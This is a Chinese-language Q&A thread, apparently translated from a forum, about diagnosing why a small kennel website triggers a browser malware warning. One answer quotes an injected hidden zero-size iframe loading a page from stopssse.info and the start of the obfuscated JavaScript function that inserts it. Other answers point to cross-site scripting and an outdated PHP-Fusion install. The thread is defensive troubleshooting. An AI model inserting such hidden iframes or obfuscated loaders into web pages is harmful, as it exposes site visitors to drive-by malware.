如何测试某个网站是否感染了恶意软件?

如何测试某个网站是否感染了恶意软件?

我的一些朋友有一个网站(www.kennelsoffie.dk),当他们遇到任何问题时,我都会尽力帮助他们。然而,这次我却搞不懂。当我使用 Google Chrome 访问该网站时,系统会显示一个警告页面,声称我尝试访问的页面包含来自stopssse.info 的元素。

我对 PHP 一窍不通,所以我直接下载了整个网站,包括数据库的备份(即 .sql 文件)。然后,我在所有文件中搜索了stopssse,但什么也没找到。

我还使用 siteadvisor.com 测试了该网站,它显示“我们测试了该网站并且没有发现任何重大问题”。

PHP 能否隐藏对恶意软件网站的引用,这样我就无法通过简单的搜索找到它?如果可以,您如何找到它?

答案1

我在生成的源代码中发现了这一点

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

它就在 body 标签的正下方,并不在实际的页面源代码中,而是由混淆的 javascript 添加的

编辑:如果你看看底部http://www.kennelsoffie.dk/includes/jscript.js你会看到一个看起来很奇怪的 JavaScript 函数。这就是我之前提到的模糊 JavaScript 函数。它以

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

最好的办法是找到并删除它。

答案2

您最有可能正在处理跨站脚本攻擊。

在这种情况下,有两个步骤:

  • 扫描数据库,寻找“脚本”标签,并将其删除。
  • 聘请一个懂 PHP 的人来修复数据输入中的漏洞并制定一些有效的清理策略。

答案3

恶意软件可能不在网站上,但可能来自外部来源带来的材料,例如广告。

答案4

网站上运行的 PHP-Fusion 版本似乎是 v6.01.3,这看起来是一个相当旧的版本,因此升级它可能是一个好主意。

PHP-Fusion 似乎有不少安全警告,包括许多 SQL 注入问题。

PHP-Fusion 的完整建议列表如下:http://secunia.com/advisories/product/5291/?task=advisories

相关内容